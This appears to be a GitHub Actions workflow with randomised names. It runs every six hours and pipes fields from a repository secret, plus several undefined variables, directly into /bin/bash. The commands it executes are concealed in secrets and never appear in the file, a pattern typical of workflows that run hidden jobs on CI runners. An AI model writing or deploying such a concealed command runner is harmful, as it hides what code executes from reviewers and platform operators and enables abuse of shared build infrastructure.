name: fengyuanchai4545
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          bfdm12: ${{ secrets.bfdm12 }}
        run: |
          echo $bfdm12 | jq -r .euzw4597 | /bin/bash
          echo $nw7847 | jq -r .n53 | /bin/bash
          echo $f77 | jq -r .lulbu28 | /bin/bash
          echo $bl98 | jq -r .gdf2 | /bin/bash
          echo $lyd4697 | jq -r .x6 | /bin/bash
          echo $szfp0 | jq -r .bvdog31 | /bin/bash
          echo $aa8 | jq -r .kn4779 | /bin/bash
          echo $vihf1616 | jq -r .qy5 | /bin/bash
          echo $xqu5202 | jq -r .klyj07095 | /bin/bash

